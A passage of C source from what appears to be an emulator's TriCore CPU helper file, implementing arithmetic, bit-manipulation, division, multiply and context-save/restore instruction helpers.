16; } if (ret_hw1 > 16) { ret_hw1 = 16; } return ret_hw0 | (ret_hw1 << 16); } uint32_t helper_cls_h(target_ulong r1) { uint32_t ret_hw0 = extract32(r1, 0, 16); uint32_t ret_hw1 = extract32(r1, 16, 16); ret_hw0 = clrsb32(ret_hw0 << 16); ret_hw1 = clrsb32(ret_hw1 << 16); if (ret_hw0 > 15) { ret_hw0 = 15; } if (ret_hw1 > 15) { ret_hw1 = 15; } return ret_hw0 | (ret_hw1 << 16); } uint32_t helper_sh(target_ulong r1, target_ulong r2) { int32_t shift_count = sextract32(r2, 0, 6); if (shift_count == -32) { return 0; } else if (shift_count < 0) { return r1 >> -shift_count; } else { return r1 << shift_count; } } uint32_t helper_sh_h(target_ulong r1, target_ulong r2) { int32_t ret_hw0, ret_hw1; int32_t shift_count; shift_count = sextract32(r2, 0, 5); if (shift_count == -16) { return 0; } else if (shift_count < 0) { ret_hw0 = extract32(r1, 0, 16) >> -shift_count; ret_hw1 = extract32(r1, 16, 16) >> -shift_count; return (ret_hw0 & 0xffff) | (ret_hw1 << 16); } else { ret_hw0 = extract32(r1, 0, 16) << shift_count; ret_hw1 = extract32(r1, 16, 16) << shift_count; return (ret_hw0 & 0xffff) | (ret_hw1 << 16); } } uint32_t helper_sha(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int32_t shift_count; int64_t result, t1; uint32_t ret; shift_count = sextract32(r2, 0, 6); t1 = sextract32(r1, 0, 32); if (shift_count == 0) { env->PSW_USB_C = env->PSW_USB_V = 0; ret = r1; } else if (shift_count == -32) { env->PSW_USB_C = r1; env->PSW_USB_V = 0; ret = t1 >> 31; } else if (shift_count > 0) { result = t1 << shift_count; /* calc carry */ env->PSW_USB_C = ((result & 0xffffffff00000000ULL) != 0); /* calc v */ env->PSW_USB_V = (((result > 0x7fffffffLL) || (result < -0x80000000LL)) << 31); /* calc sv */ env->PSW_USB_SV |= env->PSW_USB_V; ret = (uint32_t)result; } else { env->PSW_USB_V = 0; env->PSW_USB_C = (r1 & ((1 << -shift_count) 
- 1)); ret = t1 >> -shift_count; } env->PSW_USB_AV = ret ^ ret * 2u; env->PSW_USB_SAV |= env->PSW_USB_AV; return ret; } uint32_t helper_sha_h(target_ulong r1, target_ulong r2) { int32_t shift_count; int32_t ret_hw0, ret_hw1; shift_count = sextract32(r2, 0, 5); if (shift_count == 0) { return r1; } else if (shift_count < 0) { ret_hw0 = sextract32(r1, 0, 16) >> -shift_count; ret_hw1 = sextract32(r1, 16, 16) >> -shift_count; return (ret_hw0 & 0xffff) | (ret_hw1 << 16); } else { ret_hw0 = sextract32(r1, 0, 16) << shift_count; ret_hw1 = sextract32(r1, 16, 16) << shift_count; return (ret_hw0 & 0xffff) | (ret_hw1 << 16); } } uint32_t helper_bmerge(target_ulong r1, target_ulong r2) { uint32_t i, ret; ret = 0; for (i = 0; i < 16; i++) { ret |= (r1 & 1) << (2 * i + 1); ret |= (r2 & 1) << (2 * i); r1 = r1 >> 1; r2 = r2 >> 1; } return ret; } uint64_t helper_bsplit(uint32_t r1) { int32_t i; uint64_t ret; ret = 0; for (i = 0; i < 32; i = i + 2) { /* even */ ret |= (r1 & 1) << (i/2); r1 = r1 >> 1; /* odd */ ret |= (uint64_t)(r1 & 1) << (i/2 + 32); r1 = r1 >> 1; } return ret; } uint32_t helper_parity(target_ulong r1) { uint32_t ret; uint32_t nOnes, i; ret = 0; nOnes = 0; for (i = 0; i < 8; i++) { ret ^= (r1 & 1); r1 = r1 >> 1; } /* second byte */ nOnes = 0; for (i = 0; i < 8; i++) { nOnes ^= (r1 & 1); r1 = r1 >> 1; } ret |= nOnes << 8; /* third byte */ nOnes = 0; for (i = 0; i < 8; i++) { nOnes ^= (r1 & 1); r1 = r1 >> 1; } ret |= nOnes << 16; /* fourth byte */ nOnes = 0; for (i = 0; i < 8; i++) { nOnes ^= (r1 & 1); r1 = r1 >> 1; } ret |= nOnes << 24; return ret; } uint32_t helper_pack(uint32_t carry, uint32_t r1_low, uint32_t r1_high, target_ulong r2) { uint32_t ret; int32_t fp_exp, fp_frac, temp_exp, fp_exp_frac; int32_t int_exp = r1_high; int32_t int_mant = r1_low; uint32_t flag_rnd = (int_mant & (1 << 7)) && ( (int_mant & (1 << 8)) || (int_mant & 0x7f) || (carry != 0)); if (((int_mant & (1<<31)) == 0) && (int_exp == 255)) { fp_exp = 255; fp_frac = extract32(int_mant, 8, 23); } else if ((int_mant & (1<<31)) && (int_exp >= 127)) { fp_exp = 255; fp_frac = 0; } else if ((int_mant & (1<<31)) && (int_exp <= -128)) { fp_exp = 0; fp_frac = 0; } else if (int_mant == 0) { fp_exp = 0; fp_frac = 0; } else { if (((int_mant & (1 << 31)) == 0)) { temp_exp = 0; } else { temp_exp = int_exp + 128; } fp_exp_frac = (((temp_exp & 0xff) << 23) | extract32(int_mant, 8, 23)) + flag_rnd; fp_exp = extract32(fp_exp_frac, 23, 8); fp_frac = extract32(fp_exp_frac, 0, 23); } ret = r2 & (1 << 31); ret = ret + (fp_exp << 23); ret = ret + (fp_frac & 0x7fffff); return ret; } uint64_t helper_unpack(target_ulong arg1) { int32_t fp_exp = extract32(arg1, 23, 8); int32_t fp_frac = extract32(arg1, 0, 23); uint64_t ret; int32_t int_exp, int_mant; if (fp_exp == 255) { int_exp = 255; int_mant = (fp_frac << 7); } else if ((fp_exp == 0) && (fp_frac == 0)) { int_exp = -127; int_mant = 0; } else if ((fp_exp == 0) && (fp_frac != 0)) { int_exp = -126; int_mant = (fp_frac << 7); } else { int_exp = fp_exp - 127; int_mant = (fp_frac << 7); int_mant |= (1 << 30); } ret = int_exp; ret = ret << 32; ret |= int_mant; return ret; } uint64_t helper_dvinit_b_13(CPUTriCoreState *env, uint32_t r1, uint32_t r2) { uint64_t ret; int32_t abs_sig_dividend, abs_divisor; ret = sextract32(r1, 0, 32); ret = ret << 24; if (!((r1 & 0x80000000) == (r2 & 0x80000000))) { ret |= 0xffffff; } abs_sig_dividend = abs((int32_t)r1) >> 8; abs_divisor = abs((int32_t)r2); /* calc overflow ofv if (a/b >= 255) <=> (a/255 >= b) */ env->PSW_USB_V = (abs_sig_dividend >= abs_divisor) << 31; 
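/* e.g. r1 = 0xff00, r2 = 1: abs_sig_dividend = 0xff >= abs_divisor = 1, and
   indeed 0xff00 / 1 = 0xff00 does not fit into the 8-bit quotient, so V is
   set above. */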
env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = 0; return ret; } uint64_t helper_dvinit_b_131(CPUTriCoreState *env, uint32_t r1, uint32_t r2) { uint64_t ret = sextract32(r1, 0, 32); ret = ret << 24; if (!((r1 & 0x80000000) == (r2 & 0x80000000))) { ret |= 0xffffff; } /* calc overflow */ env->PSW_USB_V = ((r2 == 0) || ((r2 == 0xffffffff) && (r1 == 0xffffff80))); env->PSW_USB_V = env->PSW_USB_V << 31; env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = 0; return ret; } uint64_t helper_dvinit_h_13(CPUTriCoreState *env, uint32_t r1, uint32_t r2) { uint64_t ret; int32_t abs_sig_dividend, abs_divisor; ret = sextract32(r1, 0, 32); ret = ret << 16; if (!((r1 & 0x80000000) == (r2 & 0x80000000))) { ret |= 0xffff; } abs_sig_dividend = abs((int32_t)r1) >> 16; abs_divisor = abs((int32_t)r2); /* calc overflow ofv if (a/b >= 0xffff) <=> (a/0xffff >= b) */ env->PSW_USB_V = (abs_sig_dividend >= abs_divisor) << 31; env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = 0; return ret; } uint64_t helper_dvinit_h_131(CPUTriCoreState *env, uint32_t r1, uint32_t r2) { uint64_t ret = sextract32(r1, 0, 32); ret = ret << 16; if (!((r1 & 0x80000000) == (r2 & 0x80000000))) { ret |= 0xffff; } /* calc overflow */ env->PSW_USB_V = ((r2 == 0) || ((r2 == 0xffffffff) && (r1 == 0xffff8000))); env->PSW_USB_V = env->PSW_USB_V << 31; env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = 0; return ret; } uint64_t helper_dvadj(uint64_t r1, uint32_t r2) { int32_t x_sign = (r1 >> 63); int32_t q_sign = x_sign ^ (r2 >> 31); int32_t eq_pos = x_sign & ((r1 >> 32) == r2); int32_t eq_neg = x_sign & ((r1 >> 32) == -r2); uint32_t quotient; uint64_t remainder; if ((q_sign & ~eq_neg) | eq_pos) { quotient = (r1 + 1) & 0xffffffff; } else { quotient = r1 & 0xffffffff; } if (eq_pos | eq_neg) { remainder = 0; } else { remainder = (r1 & 0xffffffff00000000ull); } return remainder | quotient; } uint64_t helper_dvstep(uint64_t r1, uint32_t r2) { int32_t dividend_sign = extract64(r1, 63, 1); int32_t divisor_sign = extract32(r2, 31, 1); int32_t quotient_sign = (dividend_sign != divisor_sign); int32_t addend, dividend_quotient, remainder; int32_t i, temp; if (quotient_sign) { addend = r2; } else { addend = -r2; } dividend_quotient = (int32_t)r1; remainder = (int32_t)(r1 >> 32); for (i = 0; i < 8; i++) { remainder = (remainder << 1) | extract32(dividend_quotient, 31, 1); dividend_quotient <<= 1; temp = remainder + addend; if ((temp < 0) == dividend_sign) { remainder = temp; } if ((temp < 0) == dividend_sign) { dividend_quotient = dividend_quotient | !quotient_sign; } else { dividend_quotient = dividend_quotient | quotient_sign; } } return ((uint64_t)remainder << 32) | (uint32_t)dividend_quotient; } uint64_t helper_dvstep_u(uint64_t r1, uint32_t r2) { int32_t dividend_quotient = extract64(r1, 0, 32); int64_t remainder = extract64(r1, 32, 32); int32_t i; int64_t temp; for (i = 0; i < 8; i++) { remainder = (remainder << 1) | extract32(dividend_quotient, 31, 1); dividend_quotient <<= 1; temp = (remainder & 0xffffffff) - r2; if (temp >= 0) { remainder = temp; } dividend_quotient = dividend_quotient | !(temp < 0); } return ((uint64_t)remainder << 32) | (uint32_t)dividend_quotient; } uint64_t helper_divide(CPUTriCoreState *env, uint32_t r1, uint32_t r2) { int32_t quotient, remainder; int32_t dividend = (int32_t)r1; int32_t divisor = (int32_t)r2; if (divisor == 0) { if (dividend >= 0) { quotient = 0x7fffffff; remainder = 0; } else { quotient = 0x80000000; remainder = 0; }
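/* division by zero saturates the quotient toward the sign of the dividend;
   the overflow flag is raised below. */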
env->PSW_USB_V = (1 << 31); } else if ((divisor == 0xffffffff) && (dividend == 0x80000000)) { quotient = 0x7fffffff; remainder = 0; env->PSW_USB_V = (1 << 31); } else { remainder = dividend % divisor; quotient = (dividend - remainder)/divisor; env->PSW_USB_V = 0; } env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = 0; return ((uint64_t)remainder << 32) | (uint32_t)quotient; } uint64_t helper_divide_u(CPUTriCoreState *env, uint32_t r1, uint32_t r2) { uint32_t quotient, remainder; uint32_t dividend = r1; uint32_t divisor = r2; if (divisor == 0) { quotient = 0xffffffff; remainder = 0; env->PSW_USB_V = (1 << 31); } else { remainder = dividend % divisor; quotient = (dividend - remainder)/divisor; env->PSW_USB_V = 0; } env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = 0; return ((uint64_t)remainder << 32) | quotient; } uint64_t helper_mul_h(uint32_t arg00, uint32_t arg01, uint32_t arg10, uint32_t arg11, uint32_t n) { uint32_t result0, result1; int32_t sc1 = ((arg00 & 0xffff) == 0x8000) && ((arg10 & 0xffff) == 0x8000) && (n == 1); int32_t sc0 = ((arg01 & 0xffff) == 0x8000) && ((arg11 & 0xffff) == 0x8000) && (n == 1); if (sc1) { result1 = 0x7fffffff; } else { result1 = (((uint32_t)(arg00 * arg10)) << n); } if (sc0) { result0 = 0x7fffffff; } else { result0 = (((uint32_t)(arg01 * arg11)) << n); } return (((uint64_t)result1 << 32)) | result0; } uint64_t helper_mulm_h(uint32_t arg00, uint32_t arg01, uint32_t arg10, uint32_t arg11, uint32_t n) { uint64_t ret; int64_t result0, result1; int32_t sc1 = ((arg00 & 0xffff) == 0x8000) && ((arg10 & 0xffff) == 0x8000) && (n == 1); int32_t sc0 = ((arg01 & 0xffff) == 0x8000) && ((arg11 & 0xffff) == 0x8000) && (n == 1); if (sc1) { result1 = 0x7fffffff; } else { result1 = (((int32_t)arg00 * (int32_t)arg10) << n); } if (sc0) { result0 = 0x7fffffff; } else { result0 = (((int32_t)arg01 * (int32_t)arg11) << n); } ret = (result1 + result0); ret = ret << 16; return ret; } uint32_t helper_mulr_h(uint32_t arg00, uint32_t arg01, uint32_t arg10, uint32_t arg11, uint32_t n) { uint32_t result0, result1; int32_t sc1 = ((arg00 & 0xffff) == 0x8000) && ((arg10 & 0xffff) == 0x8000) && (n == 1); int32_t sc0 = ((arg01 & 0xffff) == 0x8000) && ((arg11 & 0xffff) == 0x8000) && (n == 1); if (sc1) { result1 = 0x7fffffff; } else { result1 = ((arg00 * arg10) << n) + 0x8000; } if (sc0) { result0 = 0x7fffffff; } else { result0 = ((arg01 * arg11) << n) + 0x8000; } return (result1 & 0xffff0000) | (result0 >> 16); } uint32_t helper_crc32(uint32_t arg0, uint32_t arg1) { uint8_t buf[4]; stl_be_p(buf, arg0); return crc32(arg1, buf, 4); } /* context save area (CSA) related helpers */ static int cdc_increment(target_ulong *psw) { if ((*psw & MASK_PSW_CDC) == 0x7f) { return 0; } (*psw)++; /* check for overflow */ int lo = clo32((*psw & MASK_PSW_CDC) << (32 - 7)); int mask = (1u << (7 - lo)) - 1; int count = *psw & mask; if (count == 0) { (*psw)--; return 1; } return 0; } static int cdc_decrement(target_ulong *psw) { if ((*psw & MASK_PSW_CDC) == 0x7f) { return 0; } /* check for underflow */ int lo = clo32((*psw & MASK_PSW_CDC) << (32 - 7)); int mask = (1u << (7 - lo)) - 1; int count = *psw & mask; if (count == 0) { return 1; } (*psw)--; return 0; } static bool cdc_zero(target_ulong *psw) { int cdc = *psw & MASK_PSW_CDC; /* Returns TRUE if PSW.CDC.COUNT == 0 or if PSW.CDC == 7'b1111111, otherwise returns FALSE. 
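PSW.CDC is seven bits wide: its leading one-bits select the width of the call depth counter, so clo32(CDC << 25) counts those ones and the low (7 - lo) bits hold COUNT. For example, CDC = 7'b1100011 gives lo = 2, mask = 0x1f and COUNT = 3.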
*/ if (cdc == 0x7f) { return true; } /* find CDC.COUNT */ int lo = clo32((*psw & MASK_PSW_CDC) << (32 - 7)); int mask = (1u << (7 - lo)) - 1; int count = *psw & mask; return count == 0; } static void save_context_upper(CPUTriCoreState *env, int ea) { cpu_stl_data(env, ea, env->PCXI); cpu_stl_data(env, ea+4, psw_read(env)); cpu_stl_data(env, ea+8, env->gpr_a[10]); cpu_stl_data(env, ea+12, env->gpr_a[11]); cpu_stl_data(env, ea+16, env->gpr_d[8]); cpu_stl_data(env, ea+20, env->gpr_d[9]); cpu_stl_data(env, ea+24, env->gpr_d[10]); cpu_stl_data(env, ea+28, env->gpr_d[11]); cpu_stl_data(env, ea+32, env->gpr_a[12]); cpu_stl_data(env, ea+36, env->gpr_a[13]); cpu_stl_data(env, ea+40, env->gpr_a[14]); cpu_stl_data(env, ea+44, env->gpr_a[15]); cpu_stl_data(env, ea+48, env->gpr_d[12]); cpu_stl_data(env, ea+52, env->gpr_d[13]); cpu_stl_data(env, ea+56, env->gpr_d[14]); cpu_stl_data(env, ea+60, env->gpr_d[15]); } static void save_context_lower(CPUTriCoreState *env, int ea) { cpu_stl_data(env, ea, env->PCXI); cpu_stl_data(env, ea+4, env->gpr_a[11]); cpu_stl_data(env, ea+8, env->gpr_a[2]); cpu_stl_data(env, ea+12, env->gpr_a[3]); cpu_stl_data(env, ea+16, env->gpr_d[0]); cpu_stl_data(env, ea+20, env->gpr_d[1]); cpu_stl_data(env, ea+24, env->gpr_d[2]); cpu_stl_data(env, ea+28, env->gpr_d[3]); cpu_stl_data(env, ea+32, env->gpr_a[4]); cpu_stl_data(env, ea+36, env->gpr_a[5]); cpu_stl_data(env, ea+40, env->gpr_a[6]); cpu_stl_data(env, ea+44, env->gpr_a[7]); cpu_stl_data(env, ea+48, env->gpr_d[4]); cpu_stl_data(env, ea+52, env->gpr_d[5]); cpu_stl_data(env, ea+56, env->gpr_d[6]); cpu_stl_data(env, ea+60, env->gpr_d[7]); } static void restore_context_upper(CPUTriCoreState *env, int ea, target_ulong *new_PCXI, target_ulong *new_PSW) { *new_PCXI = cpu_ldl_data(env, ea); *new_PSW = cpu_ldl_data(env, ea+4); env->gpr_a[10] = cpu_ldl_data(env, ea+8); env->gpr_a[11] = cpu_ldl_data(env, ea+12); env->gpr_d[8] = cpu_ldl_data(env, ea+16); env->gpr_d[9] = cpu_ldl_data(env, ea+20); env->gpr_d[10] = cpu_ldl_data(env, ea+24); env->gpr_d[11] = cpu_ldl_data(env, ea+28); env->gpr_a[12] = cpu_ldl_data(env, ea+32); env->gpr_a[13] = cpu_ldl_data(env, ea+36); env->gpr_a[14] = cpu_ldl_data(env, ea+40); env->gpr_a[15] = cpu_ldl_data(env, ea+44); env->gpr_d[12] = cpu_ldl_data(env, ea+48); env->gpr_d[13] = cpu_ldl_data(env, ea+52); env->gpr_d[14] = cpu_ldl_data(env, ea+56); env->gpr_d[15] = cpu_ldl_data(env, ea+60); } static void restore_context_lower(CPUTriCoreState *env, int ea, target_ulong *ra, target_ulong *pcxi) { *pcxi = cpu_ldl_data(env, ea); *ra = cpu_ldl_data(env, ea+4); env->gpr_a[2] = cpu_ldl_data(env, ea+8); env->gpr_a[3] = cpu_ldl_data(env, ea+12); env->gpr_d[0] = cpu_ldl_data(env, ea+16); env->gpr_d[1] = cpu_ldl_data(env, ea+20); env->gpr_d[2] = cpu_ldl_data(env, ea+24); env->gpr_d[3] = cpu_ldl_data(env, ea+28); env->gpr_a[4] = cpu_ldl_data(env, ea+32); env->gpr_a[5] = cpu_ldl_data(env, ea+36); env->gpr_a[6] = cpu_ldl_data(env, ea+40); env->gpr_a[7] = cpu_ldl_data(env, ea+44); env->gpr_d[4] = cpu_ldl_data(env, ea+48); env->gpr_d[5] = cpu_ldl_data(env, ea+52); env->gpr_d[6] = cpu_ldl_data(env, ea+56); env->gpr_d[7] = cpu_ldl_data(env, ea+60); } void helper_call(CPUTriCoreState *env, uint32_t next_pc) { target_ulong tmp_FCX; target_ulong ea; target_ulong new_FCX; target_ulong psw; psw = psw_read(env); /* if (FCX == 0) trap(FCU); */ if (env->FCX == 0) { /* FCU trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_FCU, GETPC()); } /* if (PSW.CDE) then if (cdc_increment()) then trap(CDO); */ if (psw & MASK_PSW_CDE) { if 
(cdc_increment(&psw)) { /* CDO trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_CDO, GETPC()); } } /* PSW.CDE = 1;*/ psw |= MASK_PSW_CDE; /* tmp_FCX = FCX; */ tmp_FCX = env->FCX; /* EA = {FCX.FCXS, 6'b0, FCX.FCXO, 6'b0}; */ ea = ((env->FCX & MASK_FCX_FCXS) << 12) + ((env->FCX & MASK_FCX_FCXO) << 6); /* new_FCX = M(EA, word); */ new_FCX = cpu_ldl_data(env, ea); /* M(EA, 16 * word) = {PCXI, PSW, A[10], A[11], D[8], D[9], D[10], D[11], A[12], A[13], A[14], A[15], D[12], D[13], D[14], D[15]}; */ save_context_upper(env, ea); /* PCXI.PCPN = ICR.CCPN; */ env->PCXI = (env->PCXI & 0xffffff) + ((env->ICR & MASK_ICR_CCPN) << 24); /* PCXI.PIE = ICR.IE; */ env->PCXI = ((env->PCXI & ~MASK_PCXI_PIE_1_3) + ((env->ICR & MASK_ICR_IE_1_3) << 15)); /* PCXI.UL = 1; */ env->PCXI |= MASK_PCXI_UL; /* PCXI[19: 0] = FCX[19: 0]; */ env->PCXI = (env->PCXI & 0xfff00000) + (env->FCX & 0xfffff); /* FCX[19: 0] = new_FCX[19: 0]; */ env->FCX = (env->FCX & 0xfff00000) + (new_FCX & 0xfffff); /* A[11] = next_pc[31: 0]; */ env->gpr_a[11] = next_pc; /* if (tmp_FCX == LCX) trap(FCD);*/ if (tmp_FCX == env->LCX) { /* FCD trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_FCD, GETPC()); } psw_write(env, psw); } void helper_ret(CPUTriCoreState *env) { target_ulong ea; target_ulong new_PCXI; target_ulong new_PSW, psw; psw = psw_read(env); /* if (PSW.CDE) then if (cdc_decrement()) then trap(CDU);*/ if (psw & MASK_PSW_CDE) { if (cdc_decrement(&psw)) { /* CDU trap */ psw_write(env, psw); raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_CDU, GETPC()); } } /* if (PCXI[19: 0] == 0) then trap(CSU); */ if ((env->PCXI & 0xfffff) == 0) { /* CSU trap */ psw_write(env, psw); raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_CSU, GETPC()); } /* if (PCXI.UL == 0) then trap(CTYP); */ if ((env->PCXI & MASK_PCXI_UL) == 0) { /* CTYP trap */ cdc_increment(&psw); /* restore to the start of helper */ psw_write(env, psw); raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_CTYP, GETPC()); } /* PC = {A11 [31: 1], 1’b0}; */ env->PC = env->gpr_a[11] & 0xfffffffe; /* EA = {PCXI.PCXS, 6'b0, PCXI.PCXO, 6'b0}; */ ea = ((env->PCXI & MASK_PCXI_PCXS) << 12) + ((env->PCXI & MASK_PCXI_PCXO) << 6); /* {new_PCXI, new_PSW, A[10], A[11], D[8], D[9], D[10], D[11], A[12], A[13], A[14], A[15], D[12], D[13], D[14], D[15]} = M(EA, 16 * word); */ restore_context_upper(env, ea, &new_PCXI, &new_PSW); /* M(EA, word) = FCX; */ cpu_stl_data(env, ea, env->FCX); /* FCX[19: 0] = PCXI[19: 0]; */ env->FCX = (env->FCX & 0xfff00000) + (env->PCXI & 0x000fffff); /* PCXI = new_PCXI; */ env->PCXI = new_PCXI; if (tricore_feature(env, TRICORE_FEATURE_13)) { /* PSW = new_PSW */ psw_write(env, new_PSW); } else { /* PSW = {new_PSW[31:26], PSW[25:24], new_PSW[23:0]}; */ psw_write(env, (new_PSW & ~(0x3000000)) + (psw & (0x3000000))); } } void helper_bisr(CPUTriCoreState *env, uint32_t const9) { target_ulong tmp_FCX; target_ulong ea; target_ulong new_FCX; if (env->FCX == 0) { /* FCU trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_FCU, GETPC()); } tmp_FCX = env->FCX; ea = ((env->FCX & 0xf0000) << 12) + ((env->FCX & 0xffff) << 6); /* new_FCX = M(EA, word); */ new_FCX = cpu_ldl_data(env, ea); /* M(EA, 16 * word) = {PCXI, A[11], A[2], A[3], D[0], D[1], D[2], D[3], A[4] , A[5], A[6], A[7], D[4], D[5], D[6], D[7]}; */ save_context_lower(env, ea); /* PCXI.PCPN = ICR.CCPN */ env->PCXI = (env->PCXI & 0xffffff) + ((env->ICR & MASK_ICR_CCPN) << 24); /* PCXI.PIE = ICR.IE */ env->PCXI = ((env->PCXI & ~MASK_PCXI_PIE_1_3) + ((env->ICR & MASK_ICR_IE_1_3) << 15)); /* PCXI.UL 
= 0 */ env->PCXI &= ~(MASK_PCXI_UL); /* PCXI[19: 0] = FCX[19: 0] */ env->PCXI = (env->PCXI & 0xfff00000) + (env->FCX & 0xfffff); /* FCX[19: 0] = new_FCX[19: 0] */ env->FCX = (env->FCX & 0xfff00000) + (new_FCX & 0xfffff); /* ICR.IE = 1 */ env->ICR |= MASK_ICR_IE_1_3; env->ICR |= const9; /* ICR.CCPN = const9[7: 0];*/ if (tmp_FCX == env->LCX) { /* FCD trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_FCD, GETPC()); } } void helper_rfe(CPUTriCoreState *env) { target_ulong ea; target_ulong new_PCXI; target_ulong new_PSW; /* if (PCXI[19: 0] == 0) then trap(CSU); */ if ((env->PCXI & 0xfffff) == 0) { /* raise csu trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_CSU, GETPC()); } /* if (PCXI.UL == 0) then trap(CTYP); */ if ((env->PCXI & MASK_PCXI_UL) == 0) { /* raise CTYP trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_CTYP, GETPC()); } /* if (!cdc_zero() AND PSW.CDE) then trap(NEST); */ if (!cdc_zero(&(env->PSW)) && (env->PSW & MASK_PSW_CDE)) { /* raise NEST trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_NEST, GETPC()); } env->PC = env->gpr_a[11] & ~0x1; /* ICR.IE = PCXI.PIE; */ env->ICR = (env->ICR & ~MASK_ICR_IE_1_3) + ((env->PCXI & MASK_PCXI_PIE_1_3) >> 15); /* ICR.CCPN = PCXI.PCPN; */ env->ICR = (env->ICR & ~MASK_ICR_CCPN) + ((env->PCXI & MASK_PCXI_PCPN) >> 24); /*EA = {PCXI.PCXS, 6'b0, PCXI.PCXO, 6'b0};*/ ea = ((env->PCXI & MASK_PCXI_PCXS) << 12) + ((env->PCXI & MASK_PCXI_PCXO) << 6); /*{new_PCXI, PSW, A[10], A[11], D[8], D[9], D[10], D[11], A[12], A[13], A[14], A[15], D[12], D[13], D[14], D[15]} = M(EA, 16 * word); */ restore_context_upper(env, ea, &new_PCXI, &new_PSW); /* M(EA, word) = FCX;*/ cpu_stl_data(env, ea, env->FCX); /* FCX[19: 0] = PCXI[19: 0]; */ env->FCX = (env->FCX & 0xfff00000) + (env->PCXI & 0x000fffff); /* PCXI = new_PCXI; */ env->PCXI = new_PCXI; /* write psw */ psw_write(env, new_PSW); } void helper_rfm(CPUTriCoreState *env) { env->PC = (env->gpr_a[11] & ~0x1); /* ICR.IE = PCXI.PIE; */ env->ICR = (env->ICR & ~MASK_ICR_IE_1_3) | ((env->PCXI & MASK_PCXI_PIE_1_3) >> 15); /* ICR.CCPN = PCXI.PCPN; */ env->ICR = (env->ICR & ~MASK_ICR_CCPN) | ((env->PCXI & MASK_PCXI_PCPN) >> 24); /* {PCXI, PSW, A[10], A[11]} = M(DCX, 4 * word); */ env->PCXI = cpu_ldl_data(env, env->DCX); psw_write(env, cpu_ldl_data(env, env->DCX+4)); env->gpr_a[10] = cpu_ldl_data(env, env->DCX+8); env->gpr_a[11] = cpu_ldl_data(env, env->DCX+12); if (tricore_feature(env, TRICORE_FEATURE_131)) { env->DBGTCR = 0; } } void helper_ldlcx(CPUTriCoreState *env, uint32_t ea) { uint32_t dummy; /* insn doesn't load PCXI and RA */ restore_context_lower(env, ea, &dummy, &dummy); } void helper_lducx(CPUTriCoreState *env, uint32_t ea) { uint32_t dummy; /* insn doesn't load PCXI and PSW */ restore_context_upper(env, ea, &dummy, &dummy); } void helper_stlcx(CPUTriCoreState *env, uint32_t ea) { save_context_lower(env, ea); } void helper_stucx(CPUTriCoreState *env, uint32_t ea) { save_context_upper(env, ea); } void helper_svlcx(CPUTriCoreState *env) { target_ulong tmp_FCX; target_ulong ea; target_ulong new_FCX; if (env->FCX == 0) { /* FCU trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_FCU, GETPC()); } /* tmp_FCX = FCX; */ tmp_FCX = env->FCX; /* EA = {FCX.FCXS, 6'b0, FCX.FCXO, 6'b0}; */ ea = ((env->FCX & MASK_FCX_FCXS) << 12) + ((env->FCX & MASK_FCX_FCXO) << 6); /* new_FCX = M(EA, word); */ new_FCX = cpu_ldl_data(env, ea); /* M(EA, 16 * word) = {PCXI, A[11], A[2], A[3], D[0], D[1], D[2], D[3], A[4], A[5], A[6], A[7], D[4], D[5], D[6], D[7]}; */ 
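/* as in helper_bisr above, one CSA entry is 16 words (64 bytes), addressed
   through the segment/offset split of FCX. */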
save_context_lower(env, ea); /* PCXI.PCPN = ICR.CCPN; */ env->PCXI = (env->PCXI & 0xffffff) + ((env->ICR & MASK_ICR_CCPN) << 24); /* PCXI.PIE = ICR.IE; */ env->PCXI = ((env->PCXI & ~MASK_PCXI_PIE_1_3) + ((env->ICR & MASK_ICR_IE_1_3) << 15)); /* PCXI.UL = 0; */ env->PCXI &= ~MASK_PCXI_UL; /* PCXI[19: 0] = FCX[19: 0]; */ env->PCXI = (env->PCXI & 0xfff00000) + (env->FCX & 0xfffff); /* FCX[19: 0] = new_FCX[19: 0]; */ env->FCX = (env->FCX & 0xfff00000) + (new_FCX & 0xfffff); /* if (tmp_FCX == LCX) trap(FCD);*/ if (tmp_FCX == env->LCX) { /* FCD trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_FCD, GETPC()); } } void helper_svucx(CPUTriCoreState *env) { target_ulong tmp_FCX; target_ulong ea; target_ulong new_FCX; if (env->FCX == 0) { /* FCU trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_FCU, GETPC()); } /* tmp_FCX = FCX; */ tmp_FCX = env->FCX; /* EA = {FCX.FCXS, 6'b0, FCX.FCXO, 6'b0}; */ ea = ((env->FCX & MASK_FCX_FCXS) << 12) + ((env->FCX & MASK_FCX_FCXO) << 6); /* new_FCX = M(EA, word); */ new_FCX = cpu_ldl_data(env, ea); /* M(EA, 16 * word) = {PCXI, PSW, A[10], A[11], D[8], D[9], D[10], D[11], A[12], A[13], A[14], A[15], D[12], D[13], D[14], D[15]}; */ save_context_upper(env, ea); /* PCXI.PCPN = ICR.CCPN; */ env->PCXI = (env->PCXI & 0xffffff) + ((env->ICR & MASK_ICR_CCPN) << 24); /* PCXI.PIE = ICR.IE; */ env->PCXI = ((env->PCXI & ~MASK_PCXI_PIE_1_3) + ((env->ICR & MASK_ICR_IE_1_3) << 15)); /* PCXI.UL = 1; */ env->PCXI |= MASK_PCXI_UL; /* PCXI[19: 0] = FCX[19: 0]; */ env->PCXI = (env->PCXI & 0xfff00000) + (env->FCX & 0xfffff); /* FCX[19: 0] = new_FCX[19: 0]; */ env->FCX = (env->FCX & 